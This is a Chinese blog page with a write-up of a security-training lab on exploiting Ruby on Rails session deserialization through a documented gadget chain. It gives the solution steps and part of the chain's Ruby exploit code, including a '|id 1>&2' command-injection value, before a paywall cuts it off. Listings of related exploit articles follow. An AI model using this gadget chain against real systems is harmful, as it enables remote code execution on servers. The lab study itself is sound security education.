Lab: Exploiting Ruby deserialization using a documented gadget chain:使用小工具链利用 Ruby 反序列化(Ruby 2.x Uni...

最新推荐文章于 2024-06-18 09:33:28 发布
最新推荐文章于 2024-06-18 09:33:28 发布
阅读量719 收藏
点赞数
文章标签: java cookie 安全 session ruby
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793766
版权

靶场内容:

本实验使用基于序列化的会话机制和 Ruby on Rails 框架。有一个记录的漏洞利用可以通过此框架中的小工具链实现远程代码执行。

要解决实验室问题,请查找记录的漏洞利用并对其进行调整以创建包含远程代码执行有效负载的恶意序列化对象。然后,将此对象传递到网站以morale.txt从 Carlos 的主目录中删除该文件。

解决方法:

  • 登录到您自己的帐户并注意会话 cookie 包含一个序列化("marshaled")Ruby 对象。将包含此会话 cookie 的请求发送到 Burp Repeater。
  • 浏览网络以找到 Luke Jahnke 的“Ruby 2.x Universal RCE Gadget Chain”
#!/usr/bin/env ruby

class Gem::StubSpecification
  def initialize; end
end


stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")

puts "STEP n"
stub_specification.name rescue nil
puts


class Gem::Source::SpecificFile
  def initialize; end
end

specific_file = Gem::Source::SpecificFile.new
specific_fi
最低0.47元/天 解锁文章
Zeker62
关注
Rails-doubletap-RCE:使用路径遍历(CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
Rails doubletap漏洞 使用路径遍历(CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups.google.com/forum/#! /rubyonrails-security/pFRKI96Sm8Q CVE-2019-5420- //groups.google.com/forum/#!searchin/ru
burpsuit 靶场( Insecure deserialization)
wanan的博客
01-22 329
burpsuit 靶场( Insecure deserialization)
【探索安全漏洞】Rails-doubletap-exploit:深入解析与应用指南
最新发布
gitblog_00023的博客
06-18 396
????【探索安全漏洞】Rails-doubletap-exploit:深入解析与应用指南???? 项目地址:https://gitcode.com/mpgn/Rails-doubletap-RCE ????项目简介???? 在现代Web开发的舞台上,Ruby on Rails以其优雅和高效而闻名,但任何框架都不免存在潜在的安全风险。Rails-doubletap-exploit正是为了揭示并利用Rails 5.2.2中...
ruby对象序列化和反序列化
chongju9866的博客
02-26 417
ruby使用ruby自身的Marshal类进行对象的序列化和反序列化操作: classA defput_str puts"testtext" end end a_s=Marshal.dump(A.new)#实例化一个A对象,使用Marsha...
Ruby ERB注入&&反序列化
qq_53142368的博客
06-07 909
Ruby ERB注入 现在的Web应用中,许多客户端以及服务器端经常会用到模板。许多模板引擎提供了多种不同的编程语言实现,比如Smarty、Mako、Jinja2、Jade、Velocity、Freemaker以及Twig等模板。作为注入攻击大家族中的一员,模板注入这种攻击形式对不同的目标所造成的影响也有所不同。对于AngularJS而言,模板注入攻击可以达到XSS攻击效果,对于服务器端的注入攻击而言,模板注入攻击可以达到远程代码执行效果。 ERB时Ruby自带的 <% 写逻辑脚本(Ruby语法) %
【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
zg_111的博客
03-27 2058
【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
008.利用堆大小差一错误爆破Linux内核-008.CVE-2016-6187 Exploiting Linux kernel
08-04
在本篇讨论中,我们将深入理解利用Linux内核中的CVE-2016-6187漏洞进行堆溢出攻击的技术细节。该漏洞源于SLUB内存分配器中堆大小差一错误,允许攻击者通过控制对象大小和特定内存布局来实现对内核内存的非法访问,...
计算机组成原理教学课件:5-Large and Fast Exploiting Memory Hierarchy.ppt
06-04
《计算机组成原理教学课件:5-Large and Fast Exploiting Memory Hierarchy》主要讲述了计算机内存层次结构的重要性和工作原理。在这个课件中,主要涵盖了以下几个关键知识点: 1. **随机存取存储器(Random Access...
Deserialization反序列化漏洞
Eason_LYC安全白帽子的成长博客
05-14 2970
详细介绍反序列化安全漏洞的知识笔记。绝佳的入门教程+配套靶场
rails_carrierwave_webp_example:使用CarrierWave和WebP-ffi(libwebp包装器)将图像转换为WebP格式的简单示例
05-23
Rails CarrierWave WebP图像编码示例 这是一个简单的Rails应用程序,显示了如何使用CarrierWave和WebP-ffi(用Ruby编写的libwebp包装器)将图像转换为WebP格式。 笔记 如果需要在不使用CarrierWave版本的情况下转换图像,则可以使用相同的方法而无需重写#full_filename方法。 因此,您的上传器将如下所示: class PostImageUploader < CarrierWave :: Uploader :: Base include WebPConverter storage :file process convert_to_webp : [ { quality : 80 , method : 5 } ] def store_dir "uploads/ #{ model . class . t
BurpWeb安全学院之不安全反序列化
lonmar的博客
07-27 2273
文章目录介绍1. 如何识别不安全反序列化1.1. PHP序列化格式1.2 Java序列化格式2. 操作序列化对象2.1. 修改对象属性介绍实验2.2. 修改数据类型介绍实验3. 利用网站程序功能4. 魔术方法5. 注入任意对象介绍实验6. Gadget chains7. ysoserial8. PHPGGC9. Ruby 2.x Universal RCE Gadget Chain10. 构造PHP gadget chain11. 构造JAVA gadget chain12. PHAR反序列化 介绍 b
Lab: Exploiting PHP deserialization with a pre-built gadget chain:利用预先构建的小工具利用 PHP 反序列化(PHPGGC的使用)...
Zeker62的博客
08-23 861
靶场内容 该实验室具有使用签名 cookie 的基于序列化的会话机制。它还使用通用的 PHP 框架。尽管您没有源代码访问权限,但您仍然可以使用预构建的小工具利用此实验室的不安全反序列化。 为了解决实验室问题,识别目标框架,然后使用第三方工具生成包含远程代码执行有效负载的恶意序列化对象。然后,研究如何生成包含恶意对象的有效签名 cookie。最后,将此传递到网站以morale.txt从 Car...
ruby:BSON序列化和反序列化
weixin_30915275的博客
11-23 153
require 'bson' doc = { _id: BSON::ObjectId.new, username:"kbanker", action_code:rand(5), time:Time.now.utc, n:1 } bson = doc.to_bson puts "Document #{doc.inspect} takes up #...
Ruby On Rails代码执行漏洞(CVE-2020-8163)技术分析与研判防护
不忘初心,护天下安全!
07-18 1587
RubyonRails5.0.1之前版本存在代码注入漏洞。远程攻击者可利用该漏洞发送特制请求执行任意代码。参考https//github.com/QianliZLP/CVE-2020-8163-即可。RubyonRails是Rails团队的一套基于Ruby语言的开源Web应用框架。system(“【具体指令】”);在研判中较为明显,一般为。......
一个例子教会你 serialize序列化与unserialize反序列化
永不停歇
05-27 8770
首先这是一个thinkphp框架中完成的一个序列化  function add(){   $arr=array('name'=>'syl','age'=>'23');   $str=serialize($arr);              //序列化serialize序列化它是php中的一种将数组序列化成一个字符串   echo $str;   echo "序列化可以将一个数组的信息序
Ruby on Rails】2021 OWASP TOP 10 的安全加固建议
里克的自习室
03-22 3273
本文讲讲 2021 版 OWASP TOP 10 在 Rails 项目中的优化加固方案。
反序列化漏洞的利用
Zeker62的博客
08-23 1094
目录PHP序列化格式JAVA序列化格式操作序列化对象修改对象属性修改数据类型使用应用程序功能魔术方法注入任意对象小工具使用预先构建的小工具ysoserialPHP 通用小工具使用记录的小工具创建自己的漏洞利用PHP序列化格式 假设一个对象User具有以下属性: $user->name = "carlos"; $user->isLoggedIn = true; 序列化之后,对象...
Explain 'int func(int x, int (*p)(int))'. exploiting this fucntion to rewrite this program in C programming languag
04-25
This is a function that takes in two arguments - an integer 'x', and a pointer to a function that takes in an integer argument and returns an integer value. The function itself returns an integer. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值